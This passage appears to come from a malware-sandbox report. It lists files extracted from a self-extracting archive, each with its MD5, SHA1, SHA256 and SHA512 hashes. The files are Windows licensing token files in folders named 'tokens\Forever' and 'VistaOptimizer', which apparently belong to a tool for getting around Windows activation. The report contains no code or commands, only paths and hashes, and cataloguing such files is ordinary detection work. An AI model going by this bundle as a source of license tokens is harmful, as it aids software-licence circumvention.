| SHA256 | 63f19f882cdd7871911562ec2f05d53c58ee391746de7bd9a97452615cd9ddf5 |
| SHA512 | d2f5bb62cf28887ab2bfd4426325e3ff86fefc68385ab1709f56e623a9946b82c50113360a2c26b988b59e967eefa8ba9c3d6bd639339b72a80094bab9b6d302 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-NetworkBridge-ppdlic.xrm-ms
| MD5 | 8710a5c32811b2d81364094902e987b4 |
| SHA1 | 7dfb0986dfb65e1f641d1a7bf8b2295300eb7389 |
| SHA256 | f883eae6787349486110046c1cc7d5045ddab819d825eaba2fe59578daa8d962 |
| SHA512 | d325a312e019358501b529fd941c07d24eb8e0cfe7db3d2616f25c39c3b443a55742be32f51bffe9f822ce0347aaf3304210f9ad22ee29ba054cf1f45eaac966 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\IASLicensing-ppdlic.xrm-ms
| MD5 | 145bc852020a15cbf1c266f227d24175 |
| SHA1 | 90f7d299e3eed3dc508f35e008896c08169137bd |
| SHA256 | def11a1ab9180f235d2233afdfff1b95d3cd9d5861560cce81876e7b2f463012 |
| SHA512 | f7d16e109ea05977e8cc2e78d10c2a91da43b9c16b947bef5525e64e636514078f030f454deb6e2cf8fbda8851ba8d9e2628c3b85b0b06dbf852b462e594f56b |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-OfflineFiles-Core-ppdlic.xrm-ms
| MD5 | dcabbaefad41b57639ab40f6549b092b |
| SHA1 | 56a16b2c5a4230fd064ab320ebe1595ad7fe1485 |
| SHA256 | 7125bccd953808e3e41cb535e6fc41ac68e7131aff7812f2ffaab61fea5081b8 |
| SHA512 | 24ce408a4486118de9ccc27c44e2828cf7a4339529a3c51e44f0bb08ac414a0c4c5a0c91a15315e444fc60194c7bfe25d34b93caf938f76f41ab478e31c04bb0 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\GroupPolicy-License-ppdlic.xrm-ms
| MD5 | fa5086f58e8f932241c11aa95793e2c1 |
| SHA1 | 13ded8cba00f73b61714ebc1522ee4ed76eb39c6 |
| SHA256 | 39b1824c863f54359c7db73c3ab31f9f02cba1d7b468f21b017224dc8194ed1b |
| SHA512 | 89dac1fafecdf1359ebf549715deb8fa63131c5cb3a5a01cb64d6d601501f7bb57b881d4d93ba57028aac95f8a4d5b91927d79f7c250de173b87edf3820330e7 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Microsoft-Windows-OfflineFiles-Core-ppdlic.xrm-ms
| MD5 | 21806ab759e66a52e8e6dd8ed1dc3272 |
| SHA1 | 883af44a404c461d318040a36607cb50f63dbcc1 |
| SHA256 | f6a02b2a15d4473dfb7d69c362b2789418876c0322008ef857f039aada5a1c04 |
| SHA512 | b0a9d88756d4f11c743853e387a9ace9bd3ad772dcaa30c1f5b1bb41bc93bf6af08037bdc53b29bb2445844937ceb7936e3811edf52a2d568dc5ef8e91589864 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\GroupPolicy-License-ppdlic.xrm-ms
| MD5 | 33b91d1d83c99f4f172a80792de08696 |
| SHA1 | ce501b6e91d96e0dea94be3900dd337ad48e0b24 |
| SHA256 | b2fd7d6361693b58f7cd5264dd9dd8ae46007d45b747842047959ac6ad513ed2 |
| SHA512 | e5dd0e8f8439973036510d91007fede419e2d6cec88de8c428de05e47bb23e8124b74a57f0648c8451ea73377316d0e2afb24beedfa4c961a78285dddf0ebb9a |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\GroupPolicy-License-ppdlic.xrm-ms
| MD5 | 8aa272b295a648066b2a4ed3ce735cc2 |
| SHA1 | 5fad7788cffac50ecbdf06bb3cba1e0460528b02 |
| SHA256 | 240942b86d2d82e5244c7a30cebeb53f9648fe8d3bf04d39c01340c715170aca |
| SHA512 | 415e8dfc46f3f7f06cbfc5775818ea95c865b3fcbec1615f36598b68e396fae1de32468632c4b192d7d7b442574381378f306d0a97b631e1ba55abd1569af398 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\feclient-ppdlic.xrm-ms
| MD5 | e59ca3198ea3b29db912dc4a992ea597 |
| SHA1 | 473757fa56fc5bd35dd82677ee6a2ce947f00dd0 |
| SHA256 | 298a0ff8e04375a903eaa53f5fbaf4c6bbb3713e4feb2a95a4bee45426a286b3 |
| SHA512 | 4c45590af212ca806abf9da6169c8e41fbd2d1772167a22268be19e37e73c5bcd0db52265660ea13f6daa1feb4dcd138dbff35d5b9aff434cc4dadae3e651e20 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\feclient-ppdlic.xrm-ms
| MD5 | 9e5648e9a5ed9839107d9261ad06868c |
| SHA1 | 2e9ad9cc89f5241686730aa20ed8f56d5529c01b |
| SHA256 | 52fe13314f51b444ec6f95f4accfc520851257123a0d010e7ff01a0f9bb5114a |
| SHA512 | 56948386d009941682287d847965de56d6a441f6bae2a72e30f857e18f432241128daf75dda92233747116d0f2f9b7dbc6464ef878a6cab309b3351b84b73b2b |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-QWAVE-ppdlic.xrm-ms
| MD5 | 5133666a540e8d6b70240d2e44b39d64 |
| SHA1 | 950ca68dc88d3f60de4689eb665a94c83e81e602 |
| SHA256 | f2b2e2ebd77ce9ebbfa0a2395107d8cbb469aef657bab90487cd5fa0dfd93daa |
| SHA512 | 4b15a339b0d0e60fb8a0a66d92fa893787b587bbe4654d06c7120b8f0986aae3d2656fb14731e6e0e456d7f569b4600d04c88703969a4d5f51b0b6e7f5ea27ab |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-QWAVE-ppdlic.xrm-ms
| MD5 | 3a7d973e5a523ba81b0a99dcb412c4bb |
| SHA1 | e405c2b9078ca0091c8f1a25ca18fa2507d7efe6 |
| SHA256 | d95f9fa4f9139e5c4857d45dab4e9f6a2792532da188cd5e9ef64e39100f9aa0 |
| SHA512 | 8b0025f60e076a3ba3e0a316300a486dc5390eebe0c91584435026962abbd4c394aecd9b3b9d8351ef25f1cde82f6aea2049abf7dc869401420fcd09e0e7d747 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-SensorsLicense-ppdlic.xrm-ms
| MD5 | 71469ac8a38b3e7563ddd50509ed09a4 |
| SHA1 | 546e55851e1201bc91f35ea8546d89e203deabdb |
| SHA256 | 99be3013e4281a7f7a7337abd3c22b2c705756014fdcb086b527d2d27900fd35 |
| SHA512 | 1ae994e5d4357df0d8f3dd41689b654b19e3a951d8c4d843ed16e7bbd5ad158ce053d93cac4bffbd63ccc606a79c258560e713b8b132e001e9b0cdd4058d6652 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MobilePCMobilityCenter-ppdlic.xrm-ms
| MD5 | 93dc4bc22bd90360e47b6bd1731f624d |
| SHA1 | d689a4e74a45625d72888e63258e975f980df4d3 |
| SHA256 | 6432d968f282257038129ce015ef8295a8e3c35a7ee41ae413ea19543e4a0da5 |
| SHA512 | f3961f5e7a4841f6bee60fac693816e006c5c609c74c7162ec5c1a3d1dd83f6e36b63db59a763a6bcc316dd0f8c886ed0fffc7b153c1712aaa4c0704f6ce3c62 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\MicrosoftWindowsSafeDocsMain-ppdlic.xrm-ms
| MD5 | e4f69b57907917207972fd5caa818231 |
| SHA1 | 15f72cc0c21de6a39ee6185551b6e5c3e4b37228 |
| SHA256 | 173c434b9a41aae5353a9b725e6c63c31b29906a08a12324d7bbe504aadbed8e |
| SHA512 | 2cc39ec59d17683b6f17b5b25f5588faa2055dc5944d94866410f0ed748bb900c1b088681df6bc224bdb1c9d4daccbf6e1b06afa64bd8f38e62b7801c7cfdea6 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\MicrosoftWindowsSafeDocsMain-ppdlic.xrm-ms
| MD5 | 00aaa8cb8fbcb68a272c3b1d5826f88c |
| SHA1 | f7592d84ce0f7bb77aad637c8af27cd3271755c6 |
| SHA256 | fda5c8704ec12e4040bd3935cf46d6cb66667109a7abdd090a530d1117594c3f |
| SHA512 | a366696ff53244348f4b2a721e3746942f43420332ba8c7e13845500ae224e4ec77ea3faa7ca070bdaadcd4aabce01cea04a9bebf487f9b80f4b368f497fa804 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MovieMaker-ppdlic.xrm-ms
| MD5 | 3960ef775202d376ecf06dbfeeea30a9 |
| SHA1 | 51e42ad6bf4b4b2f2bb863e639cfa6d148d16c56 |
| SHA256 | 417d10de53c9841c0ac9becf0c176e49530a4f1503c117c69684b3c5ff240d8d |
| SHA512 | c37100ebd230808a8fdaab0fa529012d2064e62574aecea69be6d454db24b679d6d8fd01e55e5137b3fec0acb9dc7b562e8fdf5f0ebf003da73c9ccbc953bc1f |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\MobilePCPresentationSettings-ppdlic.xrm-ms
| MD5 | 2ef9022ba4815e9916a2edf6452d7f65 |
| SHA1 | 2075105dbfe63966124ca50d90197d0df71080b0 |
| SHA256 | 5851aae51a4caa8c3a78fbe2c8fc0b449cc636852afe5cc387c0bc0df157fb48 |
| SHA512 | ddc20af271f933f2f926bfb8154eba8ca6e26bbc537d650d30c5c1809b758263a9a40f10ebe154a2141e1b41b0007db3bdbbcde8fef1b331afdd1ee2bf34ccf7 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MobilePCPresentationSettings-ppdlic.xrm-ms
| MD5 | 78150da47691689042f84d8ab0a8c9f0 |
| SHA1 | 40a04f083a946e2805b02590833ce8d1c4d386a3 |
| SHA256 | e92b09cc9bc9eb194dc003479a90cd8cb8b48b9d04edb370428b3ae9eb99a405 |
| SHA512 | 905f3cf620c1ed10f29add32871ade55970735b0b0ce63e4cbbfccc9372ba159ee83b55fa5a70cccb2a9d1598ac3f83becffc4522d98d59dbef2718c2c914841 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\msmpeg2adec-ppdlic.xrm-ms
| MD5 | 1c9da7a2b1f5b7508e519d25cb436116 |
| SHA1 | 21edc30a83c85b1aa5a0efcce1fb462bb0744fb5 |
| SHA256 | a1c723b12e58a2bf29a80f5dd9500a5a9383390d2bd6c9d557a0594bc45da59a |
| SHA512 | 7003614f93de3c7b586d3c1381df4f029af2a562097b8c4077ea7beae86da2d1e02818906793c3a58397f9ab6727f8132306d326446cc2dfc07e8a0f1ea73a14 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msac3enc-ppdlic.xrm-ms
| MD5 | 7571b605f7667ea2a9647d79b451254d |
| SHA1 | f839bc40021cf75b67712b563bf73d9f92c98b5b |
| SHA256 | 55225242298ec4d5e08444c37c3620188ea9c90712997fa8f100258a2d4fdb40 |
| SHA512 | 90f999d06b2ce16043f0b66b1980e8352dc464d8fc0eaa0392ff4b0e48460603e53a3275884e12c31bebb3e6496eae079e06271fa0d62d2514d20f0990dec93b |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\msac3enc-ppdlic.xrm-ms
| MD5 | e2fc9086299d7a0c61da3ba2fea825ce |
| SHA1 | ebdeab65c9ac48b6b54861352595e633fb2e87be |
| SHA256 | a8be33af4ede70090349d33310c8b5a7fe9e8bee2034c82f8b30724aa2f9263f |
| SHA512 | 2cb859077d1919c35953acfc85a98e24661cc211462b98cb77c245ff0e290712ba9cccc9a4ba41661533edd0c13089ab7feab1e1c97a273454a12fa7a0292d3c |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\MobilePCMobilityCenter-ppdlic.xrm-ms
| MD5 | 55b8cd78b187fbaabbfac9b7c782d67b |
| SHA1 | 4f82671d1ce83ddf276e290e58489f3a7ab4e46d |
| SHA256 | e7c5bd87dd0f5b5760dfc239a92b7d3bf9de2eeda29d87d3a17bb318b4168300 |
| SHA512 | 35b763d9d76cc7f3b1d286f567bcd7b3030b57fc056cad12d3f8a10480648da5ff68eaa93057d1e6d6d564b31043b5aaaa3dcdfa92b62aec125cd96aff24037e |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MicrosoftWindowsSafeDocsMain-ppdlic.xrm-ms
| MD5 | 36ad4eee439e9d02eefe0f2074f47e2c |
| SHA1 | 508622c6f2cfa6eea54e696e385b90254c725288 |
| SHA256 | 3439eff764956c1af8a1778432e492eea427768bb63b0c2a7a220c232ca68a6e |
| SHA512 | 54bb1ef29abd2722c5d5e8f4d0428a480160b10f3984bb2e8f2628fbd966faad4bb75aaf282185f9113c1a7705253efce2f31b0870fae2a580a8d0ad34fa491f |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msmpeg2adec-ppdlic.xrm-ms
| MD5 | ef60ce48d1f50a99a2791bf1e06e98b5 |
| SHA1 | b77a4b9554e1db45300a1ba01388c6ad25fb2f47 |
| SHA256 | 90eae28514fafb03ed6f2ebe481e87a3c79ed585004d217e942819a749489d4a |
| SHA512 | c7e457a94f04d0bbd33a14df658747fc22a5e86326a8fcc394ccd38f6393a6e4cb72a0ddb515be312c3153cde4af5a9ab3b5723192e6409dad9e77734ea5d1cc |
memory/3472-3668-0x0000000003880000-0x00000000038CD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\NetworkProjection-ppdlic.xrm-ms
| MD5 | 85cc4685813cf776518084f72b2a3ad0 |
| SHA1 | c87b1342cd9f180f8900d9d98c90eee1577fd55f |
| SHA256 | cf2f6215e5dc36ed5257f32f8ed1f874a9769c1c9c3452e0cdb2e6aa3d13eb62 |
| SHA512 | 93b8a2844375162dfa7c798ee2ef4ba4f424f5c67a72ff3a8d0df0956c51b28b7f020fc39831d76d97f8ea83b3f957561d81a0160b8c4ee5a4aa2a608aedbdd9 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msmpeg2vdec-ppdlic.xrm-ms
| MD5 | 2c351b9ceca7dea93b4772a3c3eb152d |
| SHA1 | 55deaaf89b7bccd62edc04c79102706757fe6eef |
| SHA256 | b51b85509e4a3da50bc88670f52bf49cdf9266fff27b68d31eb7566eb607bb5c |
| SHA512 | 1ddaa89f306ba2f9816d91d7b205eb1f687cc1ace07125946f5b73d3a12300d36b742cfdfc6be46114e5a61e1b82dfe3eabd4053cebd1852882c08899ecb9f3c |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\msmpeg2vdec-ppdlic.xrm-ms
| MD5 | dcfc82b2b18c7f8fac95243f76f0eff0 |
| SHA1 | 7081fbd481377f9bb268550355e5d47542a64552 |
| SHA256 | 3aaf88d0d10da70ee393cbe0a5c66f27e9ba3779a3592cb61c6b8400d605f18f |
| SHA512 | face22677f1e3ff5d5e049a9c85a9cd709027cd6605e544a549e9fa835982ad84473c571297451ecc6b47b6bbb15818118e23b2469378c4d16e8ac8f5223f580 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msmpeg2enc-ppdlic.xrm-ms
| MD5 | cce89cfb399eea5263fb314bbe8c2e04 |
| SHA1 | 9db136e98df10d89112ca18b824e171d38e1374e |
| SHA256 | 6fc870783d0beefec80d7e9e224396c49899dfed97d93687cf41175922c7f6b4 |
| SHA512 | 4a7e0e9ce787c1f053abcec25840d16f018a4fc1756769c2ff6735c25210c05f79a0bfd3fd720ce6fdd49e91a424e8379b4aaae5821eedc91de60ec947fc1bf1 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\msmpeg2enc-ppdlic.xrm-ms
| MD5 | 83bf3834593dec83944cec2b4cdd4aea |
| SHA1 | cc729e8be652d32eb9e81dff81b74f2fd43aaecf |
| SHA256 | 1c1ae2b67538d878fc33e7eff8a428ddd7c419b3331941ddb8a1c230ef1e9c55 |
| SHA512 | bec210e885f3ee4c85e661b465433ad53853d0c3838235afd974cc4305432de63db0f860c571d2bba29795a3173ca3a22b4309e0536ecbca7b9f0e11a6debe3d |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\NetworkProjection-ppdlic.xrm-ms
| MD5 | bf30e99805d4c77eb9dff61b46e149b3 |
| SHA1 | b3e899cea912a5c02179f7a3a93cfc9fd5581ee5 |
| SHA256 | 3697a8dba337359c9fb2bd9788601cd25dd45f1e92d3ad0e94093d52daed1f5d |
| SHA512 | bbad965c41af9aa535d7a37917d9213047d44a48cdc31dd901a7413b3ae3b53a2e7169f6d1a990c8a03da365534c974ddd0602cfb9e1e70409329fc5344e143e |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\NetworkSecurity-ppdlic.xrm-ms
| MD5 | e91794915e8177dc67df9b4442138a3d |
| SHA1 | ce17317d9ae13218eb636917a3f1f2ba72301c2b |
| SHA256 | d1ada3568ee707984233d710dfe4fd59f9014689b207b183e8d5b4f9300bea2d |
| SHA512 | 3f365890e97878509f3c6cdceb8abb32aff28258e78ddd65ee9c6fa381119018b489e27b2815eb2a5a43e8d11044046a92df0e8047516ab53000d72542d2991d |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\parentalcontrols-ppdlic.xrm-ms
| MD5 | 4c2025b14f08d643aa7465dea0470a03 |
| SHA1 | e1cbadeab3952878ea6b82b8afc6c7347d951f68 |
| SHA256 | dc11df1c1cadbfc49357abbf476128b5652a9f2880242aa27d7bc98890eaaa9e |
| SHA512 | 909f37fb9541990a271ff630a63b65a64211191d891ca72482c8f01eae064a215828a59d4f82c715dec2a2b63b6176a532cd91c4bd05d3054e87aedcbed86cd2 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\parentalcontrols-ppdlic.xrm-ms
| MD5 | 8e7bf19a3009a50f455906bfe095ecaf |
| SHA1 | 96de559c2c951e85655fc46778f0a629e9f1f4d2 |
| SHA256 | e66c0de107e1cba37a354098343d4857df21eb67190034bf2953d28708e1b87f |
| SHA512 | d106438fc42d6f1e37b8d813fd8ce5fbf6f38e738454876377694d0e515b9765fe50f48a91bfafca2d1174c1785ef10a09e0ecad06c6d769a36797231cc5e284 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\parentalcontrols-ppdlic.xrm-ms
| MD5 | 98dfc2aeca9e436e0d6c7d90b36d7050 |
| SHA1 | 001723cbefeb922274e169beee7a388ad34da66d |
| SHA256 | f8ba7bee2bd32d762aa3c0533b829a49ef449acc666634e2d8d815b7d1c973d1 |
| SHA512 | be131db0aadbab937f0ed319270dcb9421442375a2ef868f0404ec21176a96f8d4d7ba8c132dffb7f1f0ad1b2e653f3114c9ffea928401615ef78e0b5ebb563b |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\OMD-API-ppdlic.xrm-ms
| MD5 | ca5077b401e98a144924175e0eb753bf |
| SHA1 | bf402dff736c087309f6697a0f4533cc448bbf2e |
| SHA256 | 0db143131f70cdbc66abb3ac82909476b172c09fb1fdf02167e85394d845dbd6 |
| SHA512 | 4ac543c430634ac02c24914761af064222af86eb0e2d5f550088ea15daf6083f4ff6576ad1a11b08eff816280ad969b05574ddda3dc20ab4871d8c10d67fc271 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\NetworkSecurity-ppdlic.xrm-ms
| MD5 | 9481971cd87bdc78d44d3e83a8554ddb |
| SHA1 | ec2eef49ef452cf6d0c5c29680e362ce714fd79f |
| SHA256 | 2947d2d577fbbfc08b0aa803c64da29983fad4351c6f9c24859057d574dbb55c |
| SHA512 | 1665cf8e62219a00234ad189261d454d12a75582db96150b7cec7d30dbc6f348b3d02c7ba8f46a898eefb6d3583b2647f4809e586f868a7118f49ec557f03eb1 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\PeerToPeerAdhocMeetings-ppdlic.xrm-ms
| MD5 | 4482158fafcd71a2b32227da1cebb3b1 |
| SHA1 | 80e462d2f364fff7305ffcfe66735553b584768e |
| SHA256 | 39cf9a305c346d102b0517f83453bb74f29a1405890b6050a9dac0cb62d14683 |
| SHA512 | 1ce6a109f9a2ab016fc7f45abb0e006845a3d737ff515185b0d960bc9d2aef067e6632113392dd68e4cfbb1a5713c680d4a0948fa802380186d2e4924146c0ee |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\PeerDist-Common-ppdlic.xrm-ms
| MD5 | 307069cb761e8f9d9702679cfdd03424 |
| SHA1 | 4f764f31aaae768ba23dd90d3f10998630d64be5 |
| SHA256 | a3ff40953151990c4be116c37c953f9791a15a45d66b202375fd6bfc79c49767 |
| SHA512 | 7a0444be3a87261e70e74e2e4ef593c8b3044fa68db96443d900ed21a2dda852e198f7c3fe199f26bbc487d742c9b4f4c5e2c9a581a9c30cddad1d1aa9d10951 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\PhotoMinFeature-ppdlic.xrm-ms
| MD5 | 2c29a6d530948477d1b3e2c1fa7e284c |
| SHA1 | 90a16d314a050327ea7eb5f36ecf75e9d1cbc2ce |
| SHA256 | 73caf41c40168d202625eb50ce40c42bbcd0cd9cd2526f82ed2059a6f0300d68 |
| SHA512 | 9e5464d57ae66574b9cb070daf34e59cd77652f1abc342f214183864fbafbf08686520408e25b0aa8325daa6b21332fc5425f8ece593a30d9ff3e0616890489f |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\PhotoMinFeature-ppdlic.xrm-ms
| MD5 | 006e064bb33f73a6da08c6b3dace55e2 |
| SHA1 | f497a9b53369ddb2af9f1247a042e843a3f6d514 |
| SHA256 | ca1765057559b80f8aeb738bf4743741ced4c9cf94e6c459ab84a30f0ebdc205 |
| SHA512 | e0ec0626623073c577c83fc5cbc1e7436a8442e95f1c93b96d79c4a463ee459d16551460a92ce300d6cdf744256dd2dd98c268d84bf6791e33a18e5ae9c6f9db |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\PhotoMinFeature-ppdlic.xrm-ms
| MD5 | 97c82d90ac5c191fa7d25dbb17453a14 |
| SHA1 | 5eedeab919c07973ad29d28dc73ea274856437ce |
| SHA256 | 89ca566d3dc108c9cd13374d6e2bac520807ec5fdd74799f1fcbcb2eec3aae2e |
| SHA512 | 4b6edecefd43be3a6029bfb830c212c6575a0f30ccd0810d2fead51ca40b1ecfb7b9be731ecf36a144f5dccd560908a935eb221cfd7b0567fa90d9f14452ffd9 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\Personalization-ppdlic.xrm-ms
| MD5 | bced4fa9373aa95f46ace2f8330ee266 |
| SHA1 | 4dec0deea10a2a905c0d7bea0e11951bdedff5c7 |
| SHA256 | b1590125dd0e2b97bca4826a28f51772469253ea809bf69afe62830b20ae1f69 |
| SHA512 | 292777e4e73f71bef1f36e7ed86b4f848d86147addb2ddeb4e5c703110cad849ffcb36dd797c2b1d9e35472fb5ce5882f94c2bf4998a7e6e2e8b9f49a97dba8f |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Printing-Spooler-Core-Localspl-Licensing-ppdlic.xrm-ms
| MD5 | a6c2758212303295e180ad70fb520d71 |
| SHA1 | 0b9d1c4d4ddcd1347dd8684b77704d865ae43df6 |
| SHA256 | 82e1ca366e969266c53ff662ab57d05ad32a3c85367c85431088df62bb2c5af5 |
| SHA512 | e7c2eb91882abc7e9d6f3f8bf28a394dad24568fbb08b79f4e1b7bcfe89663565b4274d2faabed7a768af4d3ffe9c20e8710571caec9a7a53cb62c602b566a19 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Printing-Spooler-Pmc-Licensing-ppdlic.xrm-ms
| MD5 | cd75b066cd6327ba7962cd3bfb6b1cff |
| SHA1 | e06bf103d126518e06bfebaa3f127d9a6b258b00 |
| SHA256 | 2b05d5533faa9a5e621eba4b6d75e719a0e066920ae055215f61db6facdc0743 |
| SHA512 | 1a21534251f145a1f289b6b1b1c714e911f80983283c9a56a3997b5154f6b42d97cd3f127f852789d6e61fe02e8d655dd3f660f852c616e5469143b5f65762d0 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Business\licensing\ppdlic\Printing-Spooler-Pmc-Licensing-ppdlic.xrm-ms
| MD5 | 9c6de396627100ba3f4f6449101071c2 |
| SHA1 | 3593b89ff1071d81b0b988733ae4a010c6a083b6 |
| SHA256 | 3f3e50aaa0892342f5fb17d684a9b08c6491f4d596ba288e7b2147a3a1d8565c |
| SHA512 | 052fe7fee9aa307628507d5c130f74c95e37b8d193de9d92fa5c52e009f1d90cf75ab0af3f64ee887cfcb50beb3ec25cebb6eaf00fb07ee15d7e27ccaefdd170 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\provsvc-license-ppdlic.xrm-ms
| MD5 | 5cdb715a6db8c7d1eb87010f0f5cf9d3 |
| SHA1 | 29f448e4b8ce39bb0810b5bb8bdbd52190b319f0 |
| SHA256 | 0094bdb31f236b0732afeb81bb614e5b3ae5407d2a337d79b55c092eb3387e8f |
| SHA512 | fd2ce2d4d8d0873b20e0b6f4ff9604d75d1761bff4537b4ee77e1771c2cbb08a9ae4cb871b2944653d4873811a28bfbbdafe249fdb2b84c9b71775251c115b99 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Printing-Spooler-Core-Spoolss-Licensing-ppdlic.xrm-ms
| MD5 | 28d53b28c876f76f3f8d65ba0738ea86 |
| SHA1 | 8fbf7be305794623bb80f79391485f0fc6cd8532 |
| SHA256 | cbd99db274416f8d392c2b4fb06d584a672a14093e1e0f7f8f7ce29edfccec19 |
| SHA512 | fae916f8b0b6c19cb814f1efc72d70b166043082ca9ffa6bbd9976aa62bc29b42603fd605c82b4a4623c4b5ff624c5a5586aaf9fc754ded8366d6bdca3ca2d08 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Printing-Spooler-Core-Spoolss-Licensing-ppdlic.xrm-ms
| MD5 | fec8778c37d9bb722af4ea788ddcf5f4 |
| SHA1 | 77d1f28c33706148d9a302dc2fadc9099257a72a |
| SHA256 | 92b9992e551df53800081ade8184034fed5b41ec3e6795f8d91042c6604c847a |
| SHA512 | 64ae7b996d348bb23c7c6d3503f1c71b032c86a6b26794cb4b3fd18b01cb9f09e0439cca3a33ef48dafdf10bcf96c0c9556e8ae9fab26ec464a8f42dbf31d58b |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\provsvc-license-ppdlic.xrm-ms
| MD5 | 57b763f840c415946380224c05303876 |
| SHA1 | 5fe46b83879a96b0f2e1e9ada9d3a6f9db24de14 |
| SHA256 | 9d2fd0ad48117aeabab29a185cdea02f149e99429322bd056414ad1230f143b8 |
| SHA512 | 03145f93f9b34587b39ec4d81f2a067f1e267d1bb6f3f66bff37e42d693c066dddf1e9f3313fa092bf9b823394c40cd45d34e5481ea3eca1e7fa9d5143fdac7c |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Printing-Spooler-Core-Spoolss-Licensing-ppdlic.xrm-ms
| MD5 | a30b7723a419324978d6dc3b770159f9 |
| SHA1 | 0e929af2e93aab7855dac3faadfca8157d70dc69 |
| SHA256 | b719bff57185e7a17038e08e38f9dcd8f7b0f40ed94e0c59513fba2fd9845cf3 |
